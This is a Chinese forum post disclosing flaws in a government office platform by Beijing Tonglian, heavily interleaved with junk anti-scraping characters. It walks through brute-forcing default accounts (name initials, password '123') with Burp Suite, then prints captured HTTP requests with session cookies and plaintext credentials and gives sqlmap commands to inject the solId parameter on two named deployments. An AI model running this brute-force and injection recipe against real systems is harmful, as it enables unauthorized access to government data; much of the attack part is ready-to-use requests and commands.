|
! R2 g. \2 B5 h8 K5 F: g" e
: N/ a! j# s2 X L6 G ~# u9 w$ m
, Z+ m1 ~. Y- a3 Z1 n6 X4 [& n3 |7 ~ {- N* Z+ W* G* s
平台简介:
# R* a2 Z) s+ E # S. @' R$ R5 u* F, a! f9 I7 ]( _
0 V. {3 T' v9 O Q ' I! @- u6 X% s' E" \% D! a" |. e
& ?) n3 P. B) _% z. o
" T. P+ F7 z9 c+ y1 L7 V. K$ m 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
% w+ @) J! ^) I. K( V; y' C同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
% U9 n! z0 V# r) V同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!# U( G* O& X6 v9 Z0 X- c- z0 b
h/ `5 J+ U: u& Y6 X S7 s
( t8 o8 ^6 T7 d# Z# Y7 M: E 6 M Z1 I' G; q3 g
- |+ F4 M* D. m L2 h3 Q
" U/ {+ L' V3 o. K
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: Y. m; G/ t2 q& I, _8 \4 y
/ ~$ t# B. T3 n
6 c6 ]% N; \3 `7 I; F& y * ]" P t5 l+ }% u
R8 h/ }! ~* _3 y, q
: I \/ g* R3 E; c/ s: K o http://1.1.1.1:7197/cap-aco/#(案例2-)
* ^6 q! l$ c" v, G! U2 ?. f / I$ B0 F3 G$ S5 j
1 ?9 \+ ~; e$ ~6 |9 B
http://www.XXOO.com (案例1-官网网站)% q* w* N1 o+ v
" a4 N1 l' G) \% ~2 T- S _& [
9 N h/ Q* Z3 { ; O) N6 B9 h, U; F' T
$ v' c% r8 A3 e
- N( Z9 o& n* J( F4 t, [& r 漏洞详情:
6 R1 d# r; U' C) C h" y
% h; e) x1 O( F o c% x$ }6 q* I0 G
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试7 r. S' u0 c4 Y8 O! V% n
7 k7 l m- b% ~ d: k
) H/ ~" C- l8 B 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
: e/ F' W- u2 s; ]! @
7 y5 |) U2 Z% G. h8 z5 d
4 p5 V8 _3 {1 v; o9 h 1 I6 t7 ]: ~: u( E8 k
6 ^, D' ^3 G% s5 j" L# |
+ @- r& f7 K* \6 Y
2 t+ J9 P6 {1 \" Y* R; ]/ e
6 H4 Z6 \7 n! G6 `; R7 \% L) A; z* V0 o* ~+ B0 h+ \. s
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
+ ]+ \! B3 R. X/ J : G4 y7 W4 S9 E; G: e
; x% W- O1 y; |2 {0 r 1、案例1-官方网站2 J! M1 P2 n ~
$ ]- Z" _- p- t# [3 {. ]9 Q7 `2 ]! Y. v: B
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.10 C" S/ x7 X6 e" l" C6 B
8 ]: z8 |+ H, g' [& x
6 C) c9 ~) B, G0 e3 ~1 c' G, _/ s& n
Host: www.XXOO.com) y8 |" K' D: q% `; Q- T
) L9 f8 u! h' n- z% `/ E
. B5 p1 ^, X" F Proxy-Connection: Keep-Alive8 E+ v b! r6 _+ f. D3 ~* ]
+ Q0 O& M6 K! p; L9 U7 b
, \8 Y: h. n2 B% L0 _ Accept: application/json, text/javascript, */*; q=0.018 J% }# N y+ f5 F3 W
) w$ I/ q6 w3 \ x0 h2 B$ k+ y, A8 e/ D7 O
Accept-Language: zh-CN
1 P4 G( F0 c) V& `
5 c) c! c- `" i& F+ V l; W. [5 }" s$ y1 t* Q- r6 C' z7 B
Content-Type: application/json$ a2 x" ?3 N6 H* k/ y
$ _$ @: M, H( L) C h. v* z
1 F1 y& n" k, j( Y% o) Z3 r% P
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko) G- R, R" t" J% P
# M) h( C, @" q9 _+ \/ g: ~
% R+ @ r8 S [9 A2 W/ c& ]3 z
X-Requested-With: XMLHttpRequest
$ \7 E: |* d- W' w/ z- z/ ?: @
: r) C$ v: }# ^8 ~& U$ ?9 Z
! x! Z) q3 X# {! N6 W Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002% ?9 h3 `0 K: v! u
4 J# Y0 k" o f/ N. l' I- z: S5 Y4 L) m& f. }% e1 u1 S
Accept-Encoding: gzip, deflate, sdch7 h" ?! @8 A1 u
3 ], l$ s& |3 o7 ^. v P- y" C0 e) F
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e8 b v$ m$ e \; n
3 n! p) v# _% a8 K. w7 B$ N+ H2 n
' f, Z( f, S8 e5 O3 ] 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:8 [1 }, h/ U- d0 {7 T! F* a
1 W, o( [+ A+ v4 }/ [$ c- D+ u# U- k1 Z( J# M4 v: J! J
9 h8 y' ] i9 [/ L/ G - }, G, m2 e1 g
1 B* {/ O M- h 
4 E% ]- ^ t4 F/ q8 y
6 ?; v& Z4 l; W# h# I# D" }. Q. z- H8 G( p9 Q1 h0 [/ Z" w
3 @6 d2 w( u6 i% @( Q8 w
; V1 N/ S8 i9 W) N
- ?, J, r# d* k0 q & l. g( r9 u; H; `0 O+ y+ C
$ Q: C" ~% G, H9 ^7 F4 E1 c) g* [: e) j) m5 d9 a) s1 D
, R2 f2 [+ P) i" `2 p$ h5 d& e
7 ~, }' c7 n7 G% c( c% W- D1 S2 J+ g5 y$ _
2、案例2-某天河云平台
) p& Z3 V( j- A2 [& ~0 ]
( M7 \. Q0 i" H \" M+ D6 f
$ Z' q$ H% S# t3 `* I* e/ U* U GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
( W {( f* g3 P E9 J" ^
8 |2 j8 g- @5 @* L0 l+ p
' z- E/ M- @9 R* S3 a$ x Host: 1.1.1.:7197$ R1 S, r+ m5 u, m3 G* {
* q+ @2 T/ `) _! ~' z
$ `1 e8 p5 U- ? n; j2 S1 N Accept: application/json, text/javascript, */*; q=0.012 e; o& O; p5 H- X
0 x* Z P( x+ B5 G x7 \2 J
, s$ k, ^( V. m. B( E5 X X-Requested-With: XMLHttpRequest% b5 R Y- {9 w+ W& v' n% Z
5 v! E( E/ F' f% }8 f& u- u) a
. [& i) F8 y5 b User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
( I7 `' A( Y& b; \
: U( P2 S" D: x' d* s' f8 {/ Z5 |6 I4 ^/ @: l2 }; g4 {8 K
Content-Type: application/json
% |; Z$ n' \" N# w% F& S) ^
! v. F$ G' F$ H* ^( l6 h' O, t6 l1 l/ S
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
2 ]; w; J; j: @9 T. w2 U' _$ u* z, d% q' E
1 a5 B( c; A# j; ^
6 O2 G; Y& s4 K* c, J* L4 g3 D Accept-Language: zh-CN,zh;q=0.8* f' Z( b9 n; l( L2 A, \+ `
( p x# B& ?6 G7 A5 N0 {
+ h% l5 s# X; D Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=17 F; K) S5 {4 A( V# k5 D
! P* c$ Q6 K5 ~* t5 L& x
+ g7 _: f d g% E% b1 ^ Connection: close5 G; b$ g7 m6 K* P$ W. ]
) y4 r% j: P" g& g: m
1 Z6 r# `/ J0 C 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:; H5 v8 C4 n) q
S0 t. E$ p! s3 r& k% f# t) k
, I) B! J! Z4 k. [# d6 X# M 
+ } o' m4 W3 x. N. F # [. J% g1 a# E: U
6 u# I8 \6 |. V0 L
s' [, v1 n' T7 v- k
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对